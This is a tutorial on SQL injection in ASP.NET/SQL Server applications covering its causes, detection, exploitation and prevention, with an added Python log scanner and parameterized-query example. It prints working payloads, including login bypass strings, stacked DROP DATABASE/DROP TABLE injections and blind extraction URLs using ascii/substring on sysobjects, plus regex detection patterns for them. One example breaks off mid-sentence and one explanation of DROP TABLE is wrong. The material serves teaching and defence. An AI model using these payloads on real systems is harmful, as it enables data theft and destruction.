
SQL INJECTION GUIDE

1. Overview

a. Definition

SQL injection is a technique that lets attackers execute unauthorized SQL queries (queries the developer did not anticipate) by exploiting weaknesses in the input validation of web applications. Its consequences are severe: attackers can delete or modify data, since they effectively gain full control over the application's database. This flaw typically occurs in web applications whose data is managed by database management systems such as SQL Server, Oracle, DB2 and Sybase.

b. Classification

SQL Injection: flaws in SQL statements sent directly to the database, whose effect can be seen or inferred.

Blind SQL Injection

2. Causes

Most SQL injection flaws originate with the programmer. Causes that can introduce the flaw and make it easy to exploit include:

a. Not checking the characters used in the query

This form of SQL injection occurs when the code that checks input data in an SQL query is missing. As a result, an end user can run unintended queries against the application's database. The following line of code illustrates the flaw:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"

This statement is designed to return the records for a specific user name from the users table. However, if the "userName" variable is crafted in a particular way by a malicious user, it can become an SQL query with a purpose quite different from what the code's author intended. For example, suppose the value entered for userName is:
b. Incorrect type handling

This form of SQL injection typically occurs because the programmer or user defines the input data unclearly, or because the step that checks and filters the input's data type is missing. It can happen when a numeric field is used in an SQL query but the programmer omits the input check that verifies whether the data the user entered is actually a number. For example:
statement := "SELECT * FROM data WHERE id = " + a_variable + ";"

It is clear that the code's author intends a number to be entered, matching the numeric id field. However, instead of a number the end user can enter a string of characters, which can turn the statement into a complete new SQL query that bypasses the escape character. For example, set the value of a_variable to:
1;DROP TABLE users

In that case it will delete the user with the corresponding id from the database, and the complete query is interpreted as:
SELECT * FROM DATA WHERE id = 1;DROP TABLE users;

c. Security flaws inside the database server

Sometimes the vulnerability lies in the database server software itself, as in the case of the mysql_real_escape_string() function on MySQL servers. This allows an attacker to carry out a successful SQL injection attack using unusual Unicode characters even when the input is being escaped.
d. Blind SQL injection

3. Attack methods and detection methods

a. SQL Injection

Detection by modifying the query string: to test for the first form of SQL injection, one usually appends a ' (quote character) to addresses of the form user.php?id=1 or user.php?id= ; for example, http://site.com/user.php?id=1' and http://site.com/user.php?id=' both work. Similarly, in input forms such as Search or Login, try entering a single quote and submitting. Some URL scanning tools can also be used to check whether the page is vulnerable to SQL injection.

Attack method: first, find a page vulnerable to SQL injection. Use the detection methods above to find a page with an SQL injection flaw. Example:

Example 1: attack through the query string

http://yoursite.com/index.aspx?category=food

Here the page takes the query value category=food and displays the list of products in the category named food. The code looks something like:

    string catQuery = Request.QueryString["category"];
    string strQuery = "Select * from tblProduct where ProductCat = '" + catQuery + "'";
    // ... execute strQuery against the DB

The string food is passed into the query to retrieve the data. In the example above catQuery equals food, and the database query becomes:

    Select * from tblProduct where ProductCat = 'food'

The query above returns a result set containing one or more rows matching the condition WHERE ProductCat = 'food'. If the URL is changed to http://yoursite.com/index.aspx?category=food' or 1=1-- , the variable catQuery holds the value "food' or 1=1-- " and the SQL query becomes:

    SELECT * FROM tblProduct WHERE ProductCat ='food' or 1=1 --'

This query selects everything in the product table regardless of whether the PCategory field equals 'food'. The two dashes (--) tell MS SQL Server that the query ends there; everything after "--" is ignored.

The danger is that tables can be deleted or the database dropped. For example, suppose that by exploiting SQL injection we have learned the database name, the table names and the columns of the tables, and that the database is called ShopExam. It can be dropped through the query string:

    http://yoursite.com/index.aspx?category=food'; drop database ShopExam --

at which point the query is:

    SELECT * FROM tblProduct WHERE ProductCat ='food'; drop database ShopExam --

Further SQL statements such as Update or Insert can also be injected, for instance inserting a record containing admin details so that the newly added (updated) data can be used to log into the site.

Example 2: bypassing login

- With this form of attack, a hacker can easily get past login pages thanks to flaws in the SQL statements that operate on the web application's database.
- Consider a typical case: to let users access protected pages, a system usually builds a login page that asks for a user name and password. After the user enters them, the system checks whether the user name and password are valid and decides whether to allow or refuse further access.
- In this case two pages can be used: an HTML page that displays the input form and an ASPX page that processes the user's input. For example: Login.aspx
    <table width="300" border="0" cellpadding="2" cellspacing="2">
        <tr>
            <td width="100">Username</td>
            <td><asp:TextBox ID="txtUsername" runat="server"></asp:TextBox></td>
        </tr>
        <tr>
            <td>Password</td>
            <td><asp:TextBox ID="txtPassword" runat="server"></asp:TextBox></td>
        </tr>
        <tr>
            <td colspan="2" align="center">
                <asp:Button ID="btnSubmit" runat="server" Text="Đăng Nhập" onclick="btnSubmit_Click" />
            </td>
        </tr>
    </table>

Login.aspx.cs
    SqlConnection cnn = DataConnect.getConnection();
    cnn.Open();
    SqlCommand cmd = new SqlCommand("select * from tbluser where userName = '" + txtUsername.Text.Trim() + "' And UserPassword = '" + txtPassword.Text.Trim() + "'", cnn);
    SqlDataReader rs = cmd.ExecuteReader();
    if (rs.HasRows)
    {
        while (rs.Read())
        {
            ltlMsg.Text = "<h1>Đăng nhập thành công : Username: " + rs["userName"].ToString() + "</h1>";
            break;
        }
    }
    else
    {
        ltlMsg.Text = "<h1>Sai tài khoản hoặc mật khẩu</h1>";
    }
    cnn.Close();

Example: if we now enter for both Username and password the value ' OR '1' = '1 , the SqlCommand query takes the form:

    select * from tbluser where userName = '' OR '1' = '1' And UserPassword = '' OR '1' = '1'

b. Blind SQL injection

Detection: test through the query string.

Detecting a "blind sql injection" flaw: suppose we have the URL http://www.company.com/pressRelease.jsp?pressID=5 and the SQL statement executed is:

    SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5

To determine whether it is vulnerable to blind SQL injection, try adding a condition that is always true, for example:

    http://www.company.com/pressRelease.jsp?pressID=5 AND 1=1

If the database server executes SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5 AND 1=1 and we still get back the same page as http://www.company.com/pressRelease.jsp?pressID=5, then the page is vulnerable. A scanning tool can also be used.

Exploiting the flaw: we now guess information about the database by asking the server true/false questions. For example, to ask the server "is the current user dbo?":

    http://www.company.com/pressRelease.jsp?pressID=5 AND USER_NAME()='dbo'

(USER_NAME() is a SQL Server function that returns the name of the current user.)

If the current user really is 'dbo', we get back http://www.company.com/pressRelease.jsp?pressID=5; otherwise no page is returned. By combining such questions with functions we can ask far more complex ones. The following example retrieves a table name one character at a time:

    http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))>109

The SELECT asks for the name of the first table in the database. substring() returns the first character of that result. lower() simply converts the character to lower case. ascii() returns the ASCII value of the character.

If the server reports no error, we know the first character of the table name is a letter after "m" (since in the code table the value of "m" is 109). Next:

    http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))>116

If an error is reported, we know the ASCII value of this first character lies between "n" and "t" (the value of t is 116). Narrowing down step by step, the first character turns out to lie between "n" and "o" (110 and 111). Next:

    http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))=111

The server reports no error and returns the page http://www.company.com/pressRelease.jsp?pressID=5, so the first character of the table name is "o". To guess the second character we do the following:

    http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 2,1)))>109

(note that the argument changes from 1 to 2), and by repeating this we gradually obtain the full table name (in this example, "orders").

The ASCII character set has 256 characters, distributed as follows:
+ the first 32 characters are non-printable control characters, e.g. ENTER (code 13) and ESC (code 27)
+ codes 32-47, 58-64, 91-96 and 123-127 are special characters such as period, semicolon, parentheses, brackets, question mark, etc.
+ codes 48-57 are the 10 digits
+ codes 65-90 are the upper-case letters A-Z
+ codes 97-122 are the lower-case letters a-z
+ the remaining ASCII codes are graphics characters
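From the defender's side, the probes described in section 3 leave recognizable traces in web server access logs. The following Python is an added example, not code from this document: it parses constructed common-log-format lines, decodes each query-string value and flags the indicators the text describes (a stray quote, or 1=1, the -- terminator, the ascii/substring/lower/USER_NAME calls and sysobjects). The log lines, IP addresses and rule names are all constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Indicator rules written for this example (not a product ruleset), taken from
# the probes above: a stray quote, tautologies, "--", the SQL Server functions
# used for character-by-character blind extraction, catalog names, stacked DDL.
PATTERNS = {
    "quote": re.compile(r"'"),
    "tautology": re.compile(r"\b(?:or|and)\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I),
    "comment": re.compile(r"--"),
    "blind_fn": re.compile(r"\b(?:user_name|ascii|substring|lower)\s*\(", re.I),
    "catalog": re.compile(r"\bsysobjects\b|\bxtype\b", re.I),
    "stacked_ddl": re.compile(r"\b(?:drop|alter)\s+(?:table|database)\b", re.I),
}
# A lone quote is weak evidence (think O'Brien); these indicators stand on their own.
STRONG = {"tautology", "blind_fn", "catalog", "stacked_ddl"}

LOG_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify_request(path_and_query: str) -> set:
    """Return the set of indicator names found in the decoded query-string values."""
    hits = set()
    for _, value in parse_qsl(urlsplit(path_and_query).query, keep_blank_values=True):
        value = unquote_plus(value)  # second pass catches double-encoded probes
        hits.update(name for name, rx in PATTERNS.items() if rx.search(value))
    return hits

def is_suspicious(hits: set) -> bool:
    return bool(hits & STRONG) or len(hits) >= 2

def scan_log(lines):
    """Return (ip, request, status, sorted indicators) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RX.match(line)
        if m:
            ip, request, status = m.groups()
            hits = classify_request(request)
            if is_suspicious(hits):
                findings.append((ip, request, status, sorted(hits)))
    return findings

# Constructed sample log: a normal visit, the three probes from the text, a benign quote.
SAMPLE_LOG = [
    '198.51.100.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.aspx?category=food HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.aspx?category=food%27%20or%201%3D1-- HTTP/1.1" 200 9812',
    '203.0.113.7 - - [10/Oct/2023:13:57:12 +0000] "GET /pressRelease.jsp?pressID=5%20AND%201%3D1 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Oct/2023:13:58:40 +0000] "GET /pressRelease.jsp?pressID=5%20AND%20ascii(lower(substring((SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype%3D%27U%27),1,1)))%3E109 HTTP/1.1" 200 2048',
    '198.51.100.11 - - [10/Oct/2023:14:01:03 +0000] "GET /search.aspx?q=O%27Brien HTTP/1.1" 200 700',
]
```

Running scan_log(SAMPLE_LOG) flags only the three requests from 203.0.113.7; the O'Brien search carries a quote but no strong indicator and is left alone.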

4. Impact

a. Data loss, data corruption, or insertion of invalid data. Since SQL injection by its nature attacks the database, once the database is attacked we face very serious risks such as:
- the database or tables being dropped
- loss and leakage of sensitive information
- information being altered or corrupted
- admin privileges being taken over

5. Prevention

a. Validate the data: for example, given a query string of the form /Product.aspx?ID=100, the ID is taken from the query string to fetch the corresponding data. The variable that receives it should be an int, converted to the required type:
    int _ID;
    try
    {
        _ID = Convert.ToInt32(Request.QueryString["ID"]);
    }
    catch
    {
        _ID = 0;
    }

b. Remove single-quote characters from the query: regular expressions or Replace can be used in code to neutralize queries that contain database keywords, especially the single quote.

c. Use Parameters and OleDbCommand instead of direct query strings.

Using Parameters in .NET itself validates the data and prevents injection. Example:
    SqlCommand cmd = new SqlCommand("select * from tbluser where userName = @Username And UserPassword = @UserPassword", cnn);
    cmd.Parameters.Add(new SqlParameter("@Username", System.Data.SqlDbType.NVarChar));
    cmd.Parameters.Add(new SqlParameter("@UserPassword", System.Data.SqlDbType.NVarChar));
    cmd.Parameters["@Username"].Value = txtUsername.Text.Trim();
    cmd.Parameters["@UserPassword"].Value = txtPassword.Text.Trim();
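As an added illustration, not code from this document, here is the same login in Python with sqlite3 standing in for SQL Server: the concatenated query from Login.aspx.cs beside the bound-parameter form from item c, plus the integer check from item a. The tbluser table and its admin account are constructed for the example.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for tbluser (sqlite3 in place of SQL Server)."""
    cnn = sqlite3.connect(":memory:")
    cnn.execute("CREATE TABLE tbluser (userName TEXT, UserPassword TEXT)")
    cnn.execute("INSERT INTO tbluser VALUES ('admin', 's3cret')")  # constructed sample account
    return cnn

def login_vulnerable(cnn, username: str, password: str):
    """Same construction as Login.aspx.cs: user input is spliced into the SQL text."""
    sql = ("select * from tbluser where userName = '" + username.strip() +
           "' And UserPassword = '" + password.strip() + "'")
    return cnn.execute(sql).fetchone()

def login_parameterized(cnn, username: str, password: str):
    """Counterpart of the @Username/@UserPassword fix: values are bound, never parsed as SQL."""
    sql = "select * from tbluser where userName = ? And UserPassword = ?"
    return cnn.execute(sql, (username.strip(), password.strip())).fetchone()

def parse_product_id(raw) -> int:
    """Counterpart of the Convert.ToInt32 check for /Product.aspx?ID=...: non-integers become 0."""
    try:
        return int(raw)
    except (TypeError, ValueError):
        return 0

def demo():
    """Feed the document's ' OR '1' = '1 input to both logins; return (vulnerable_row, fixed_row)."""
    cnn = make_db()
    payload = "' OR '1' = '1"
    return login_vulnerable(cnn, payload, payload), login_parameterized(cnn, payload, payload)
```

demo() returns the admin row from the concatenated query and None from the parameterized one, because the bound value is compared as a literal string rather than parsed as part of the WHERE clause.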

d. Use only the stored procedures that are needed; unused stored procedures in the master DB can be removed, such as:

1. xp_cmdshell
2. xp_startmail
3. xp_sendmail
4. sp_makewebtask

e. Do not use the SA user. If only data queries are needed, set permissions so that each user has read-only access to just the databases required.

6. Demo and reference links

a. Accompanying Code Project: the accompanying CodeProject sample contains demo code for the basic SQL injection flaws and how to prevent them.

b. Demo pages explaining attack methods and prevention:
1. http://unixwiz.net/techtips/sql-injection.html
2. http://msdn.microsoft.com/en-us/library/ms161953.aspx
3. http://sqlzoo.net/hack/

7. Supporting and testing tools

a. Manual testing: test by hand by adding a single quote to query strings and input forms.

b. SQL Injection Add-On for Firefox: a tool for testing for SQL injection flaws, integrated into Firefox. Download at: https://addons.mozilla.org/vi/firefox/addon/6727/

c. BSQL Hacker: a tool for scanning for SQL injection; a tutorial video and the download are at: http://labs.portcullis.co.uk/application/bsql-hacker/
